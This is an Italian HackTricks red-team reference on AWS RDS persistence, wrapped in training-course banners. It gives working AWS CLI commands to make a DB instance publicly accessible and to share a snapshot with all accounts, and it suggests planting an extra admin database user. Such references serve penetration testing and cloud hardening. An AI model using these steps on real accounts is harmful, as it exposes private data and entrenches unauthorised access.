AWS - RDS Persistence

Tip

Impara & pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Sostieni HackTricks

RDS

Per maggiori informazioni, vedi:

AWS - Relational Database (RDS) Enum

Rendere l’istanza accessibile pubblicamente: rds:ModifyDBInstance

Un attacker con questa autorizzazione può modificare un’istanza RDS esistente per abilitare l’accessibilità pubblica.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Crea un utente admin all’interno del DB

Un attacker potrebbe semplicemente creare un utente all’interno del DB così, anche se la password dell’utente master viene modificata, non perde l’accesso al database.

Rendi lo snapshot pubblico

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Tip

Impara & pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Impara & pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Impara & pratica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Sostieni HackTricks